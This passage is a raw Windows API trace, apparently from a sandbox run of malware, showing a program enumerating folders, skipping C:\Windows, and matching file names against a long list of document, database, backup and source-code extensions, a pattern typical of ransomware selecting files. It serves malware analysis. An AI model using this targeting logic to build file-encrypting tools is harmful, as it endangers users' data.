FindNextFileW (in: hFindFile=0x663260, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.664] FindNextFileW (in: hFindFile=0x663260, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0032.664] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0032.664] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0032.664] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0032.664] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0032.664] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.664] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0032.664] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6642a8 [0032.664] FindNextFileW (in: hFindFile=0x6642a8, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.664] FindNextFileW (in: hFindFile=0x6642a8, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0032.664] lstrlenW (lpString="desktop.ini") returned 11 [0032.665] lstrlenW (lpString=".1cd") returned 4 [0032.665] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0032.665] lstrlenW (lpString=".3ds") returned 4 [0032.665] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0032.665] lstrlenW (lpString=".3fr") returned 4 [0032.665] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0032.665] lstrlenW (lpString=".3g2") returned 4 [0032.665] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0032.665] lstrlenW (lpString=".3gp") returned 4 [0032.665] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0032.665] lstrlenW (lpString=".7z") returned 3 [0032.665] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0032.665] lstrlenW (lpString=".accda") returned 6 [0032.665] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0032.665] lstrlenW (lpString=".accdb") returned 6 [0032.665] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0032.665] lstrlenW (lpString=".accdc") returned 6 [0032.665] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0032.665] lstrlenW (lpString=".accde") returned 6 [0032.665] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0032.665] lstrlenW (lpString=".accdt") returned 6 [0032.665] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0032.665] lstrlenW (lpString=".accdw") returned 6 [0032.665] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0032.665] lstrlenW (lpString=".adb") returned 4 [0032.665] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0032.665] lstrlenW (lpString=".adp") returned 4 [0032.665] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0032.665] lstrlenW (lpString=".ai") returned 3 [0032.665] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0032.665] lstrlenW (lpString=".ai3") returned 4 [0032.665] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0032.665] lstrlenW (lpString=".ai4") returned 4 [0032.665] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0032.665] lstrlenW (lpString=".ai5") returned 4 [0032.665] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0032.665] lstrlenW (lpString=".ai6") returned 4 [0032.666] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".ai7") returned 4 [0032.666] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".ai8") returned 4 [0032.666] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".anim") returned 5 [0032.666] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0032.666] lstrlenW (lpString=".arw") returned 4 [0032.666] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".as") returned 3 [0032.666] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0032.666] lstrlenW (lpString=".asa") returned 4 [0032.666] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".asc") returned 4 [0032.666] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".ascx") returned 5 [0032.666] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0032.666] lstrlenW (lpString=".asm") returned 4 [0032.666] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".asmx") returned 5 [0032.666] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0032.666] lstrlenW (lpString=".asp") returned 4 [0032.666] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".aspx") returned 5 [0032.666] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0032.666] lstrlenW (lpString=".asr") returned 4 [0032.666] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".asx") returned 4 [0032.666] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".avi") returned 4 [0032.666] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".avs") returned 4 [0032.666] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0032.666] lstrlenW (lpString=".backup") returned 7 [0032.666] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0032.666] lstrlenW (lpString=".bak") returned 4 [0032.666] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".bay") returned 4 [0032.667] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".bd") returned 3 [0032.667] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0032.667] lstrlenW (lpString=".bin") returned 4 [0032.667] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".bmp") returned 4 [0032.667] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".bz2") returned 4 [0032.667] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".c") returned 2 [0032.667] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0032.667] lstrlenW (lpString=".cdr") returned 4 [0032.667] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".cer") returned 4 [0032.667] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".cf") returned 3 [0032.667] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0032.667] lstrlenW (lpString=".cfc") returned 4 [0032.667] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".cfm") returned 4 [0032.667] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".cfml") returned 5 [0032.667] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0032.667] lstrlenW (lpString=".cfu") returned 4 [0032.667] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".chm") returned 4 [0032.667] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".cin") returned 4 [0032.667] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".class") returned 6 [0032.667] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0032.667] lstrlenW (lpString=".clx") returned 4 [0032.667] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0032.667] lstrlenW (lpString=".config") returned 7 [0032.667] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0032.667] lstrlenW (lpString=".cpp") returned 4 [0032.668] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".cr2") returned 4 [0032.668] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".crt") returned 4 [0032.668] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".crw") returned 4 [0032.668] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".cs") returned 3 [0032.668] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0032.668] lstrlenW (lpString=".css") returned 4 [0032.668] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".csv") returned 4 [0032.668] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".cub") returned 4 [0032.668] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".dae") returned 4 [0032.668] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".dat") returned 4 [0032.668] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".db") returned 3 [0032.668] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0032.668] lstrlenW (lpString=".dbf") returned 4 [0032.668] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".dbx") returned 4 [0032.668] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".dc3") returned 4 [0032.668] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".dcm") returned 4 [0032.668] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".dcr") returned 4 [0032.668] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".der") returned 4 [0032.668] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".dib") returned 4 [0032.668] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0032.668] lstrlenW (lpString=".dic") returned 4 [0032.668] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0032.669] lstrlenW (lpString=".dif") returned 4 [0032.669] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0032.669] lstrlenW (lpString=".divx") returned 5 [0032.669] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0032.669] lstrlenW (lpString=".djvu") returned 5 [0032.669] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0032.669] lstrlenW (lpString=".dng") returned 4 [0032.669] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0032.669] lstrlenW (lpString=".doc") returned 4 [0032.669] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0032.669] lstrlenW (lpString=".docm") returned 5 [0032.669] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0032.669] lstrlenW (lpString=".docx") returned 5 [0032.669] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0032.669] lstrlenW (lpString=".dot") returned 4 [0032.669] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0032.669] lstrlenW (lpString=".dotm") returned 5 [0032.669] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0032.669] lstrlenW (lpString=".dotx") returned 5 [0032.669] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0032.669] lstrlenW (lpString=".dpx") returned 4 [0032.669] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0032.669] lstrlenW (lpString=".dqy") returned 4 [0032.669] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0032.669] lstrlenW (lpString=".dsn") returned 4 [0032.669] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0032.669] lstrlenW (lpString=".dt") returned 3 [0032.669] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0032.669] lstrlenW (lpString=".dtd") returned 4 [0032.669] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0032.669] lstrlenW (lpString=".dwg") returned 4 [0032.669] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0032.669] lstrlenW (lpString=".dwt") returned 4 [0032.669] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0032.669] lstrlenW (lpString=".dx") returned 3 [0032.669] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0032.669] lstrlenW (lpString=".dxf") returned 4 [0032.669] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".edml") returned 5 [0032.670] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0032.670] lstrlenW (lpString=".efd") returned 4 [0032.670] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".elf") returned 4 [0032.670] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".emf") returned 4 [0032.670] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".emz") returned 4 [0032.670] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".epf") returned 4 [0032.670] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".eps") returned 4 [0032.670] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".epsf") returned 5 [0032.670] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0032.670] lstrlenW (lpString=".epsp") returned 5 [0032.670] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0032.670] lstrlenW (lpString=".erf") returned 4 [0032.670] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".exr") returned 4 [0032.670] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".f4v") returned 4 [0032.670] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".fido") returned 5 [0032.670] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0032.670] lstrlenW (lpString=".flm") returned 4 [0032.670] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".flv") returned 4 [0032.670] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".frm") returned 4 [0032.670] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".fxg") returned 4 [0032.670] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".geo") returned 4 [0032.670] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0032.670] lstrlenW (lpString=".gif") returned 4 [0032.671] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0032.671] lstrlenW (lpString=".grs") returned 4 [0032.671] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0032.671] lstrlenW (lpString=".gz") returned 3 [0032.671] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0032.671] lstrlenW (lpString=".h") returned 2 [0032.671] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0032.671] lstrlenW (lpString=".hdr") returned 4 [0032.671] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0032.671] lstrlenW (lpString=".hpp") returned 4 [0032.671] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0032.671] lstrlenW (lpString=".hta") returned 4 [0032.671] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0032.671] lstrlenW (lpString=".htc") returned 4 [0032.671] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0032.671] lstrlenW (lpString=".htm") returned 4 [0032.671] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0032.671] lstrlenW (lpString=".html") returned 5 [0032.671] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0032.671] lstrlenW (lpString=".icb") returned 4 [0032.671] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0032.671] lstrlenW (lpString=".ics") returned 4 [0032.671] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0032.671] lstrlenW (lpString=".iff") returned 4 [0032.671] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0032.671] lstrlenW (lpString=".inc") returned 4 [0032.671] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0032.671] lstrlenW (lpString=".indd") returned 5 [0032.671] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0032.671] lstrlenW (lpString=".ini") returned 4 [0032.671] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0032.671] FindNextFileW (in: hFindFile=0x6642a8, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0032.671] FindClose (in: hFindFile=0x6642a8 | out: hFindFile=0x6642a8) returned 1 [0032.671] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.671] FindNextFileW (in: hFindFile=0x663260, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0032.672] FindClose (in: hFindFile=0x663260 | out: hFindFile=0x663260) returned 1 [0032.672] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39406e0 | out: hHeap=0x570000) returned 1 [0032.672] FindNextFileW (in: hFindFile=0x663220, lpFindFileData=0x353fd00 | out: lpFindFileData=0x353fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0032.672] lstrlenW (lpString="C:\\Boot") returned 7 [0032.672] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot") returned 1 [0032.672] lstrlenW (lpString="Boot") returned 4 [0032.672] lstrcmpiW (lpString1="C:\\Windows", lpString2="Boot") returned 1 [0032.672] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39406e0 [0032.672] lstrlenW (lpString="C:\\Boot") returned 7 [0032.672] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x664268 [0032.672] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.672] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0032.672] lstrlenW (lpString="BCD") returned 3 [0032.672] lstrlenW (lpString=".1cd") returned 4 [0032.672] lstrcmpiW (lpString1=".1cd", lpString2="") returned 1 [0032.672] lstrlenW (lpString=".3ds") returned 4 [0032.672] lstrcmpiW (lpString1=".3ds", lpString2="") returned 1 [0032.672] lstrlenW (lpString=".3fr") returned 4 [0032.672] lstrcmpiW (lpString1=".3fr", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".3g2") returned 4 [0032.673] lstrcmpiW (lpString1=".3g2", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".3gp") returned 4 [0032.673] lstrcmpiW (lpString1=".3gp", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".7z") returned 3 [0032.673] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0032.673] lstrlenW (lpString=".accda") returned 6 [0032.673] lstrcmpiW (lpString1=".accda", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".accdb") returned 6 [0032.673] lstrcmpiW (lpString1=".accdb", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".accdc") returned 6 [0032.673] lstrcmpiW (lpString1=".accdc", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".accde") returned 6 [0032.673] lstrcmpiW (lpString1=".accde", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".accdt") returned 6 [0032.673] lstrcmpiW (lpString1=".accdt", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".accdw") returned 6 [0032.673] lstrcmpiW (lpString1=".accdw", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".adb") returned 4 [0032.673] lstrcmpiW (lpString1=".adb", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".adp") returned 4 [0032.673] lstrcmpiW (lpString1=".adp", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".ai") returned 3 [0032.673] lstrcmpiW (lpString1=".ai", lpString2="BCD") returned -1 [0032.673] lstrlenW (lpString=".ai3") returned 4 [0032.673] lstrcmpiW (lpString1=".ai3", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".ai4") returned 4 [0032.673] lstrcmpiW (lpString1=".ai4", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".ai5") returned 4 [0032.673] lstrcmpiW (lpString1=".ai5", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".ai6") returned 4 [0032.673] lstrcmpiW (lpString1=".ai6", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".ai7") returned 4 [0032.673] lstrcmpiW (lpString1=".ai7", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".ai8") returned 4 [0032.673] lstrcmpiW (lpString1=".ai8", lpString2="") returned 1 [0032.673] lstrlenW (lpString=".anim") returned 5 [0032.673] lstrcmpiW (lpString1=".anim", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".arw") returned 4 [0032.674] lstrcmpiW (lpString1=".arw", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".as") returned 3 [0032.674] lstrcmpiW (lpString1=".as", lpString2="BCD") returned -1 [0032.674] lstrlenW (lpString=".asa") returned 4 [0032.674] lstrcmpiW (lpString1=".asa", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".asc") returned 4 [0032.674] lstrcmpiW (lpString1=".asc", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".ascx") returned 5 [0032.674] lstrcmpiW (lpString1=".ascx", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".asm") returned 4 [0032.674] lstrcmpiW (lpString1=".asm", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".asmx") returned 5 [0032.674] lstrcmpiW (lpString1=".asmx", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".asp") returned 4 [0032.674] lstrcmpiW (lpString1=".asp", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".aspx") returned 5 [0032.674] lstrcmpiW (lpString1=".aspx", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".asr") returned 4 [0032.674] lstrcmpiW (lpString1=".asr", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".asx") returned 4 [0032.674] lstrcmpiW (lpString1=".asx", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".avi") returned 4 [0032.674] lstrcmpiW (lpString1=".avi", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".avs") returned 4 [0032.674] lstrcmpiW (lpString1=".avs", lpString2="") returned 1 [0032.674] lstrlenW (lpString=".backup") returned 7 [0032.674] lstrcmpiW (lpString1=".backup", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".bak") returned 4 [0032.675] lstrcmpiW (lpString1=".bak", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".bay") returned 4 [0032.675] lstrcmpiW (lpString1=".bay", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".bd") 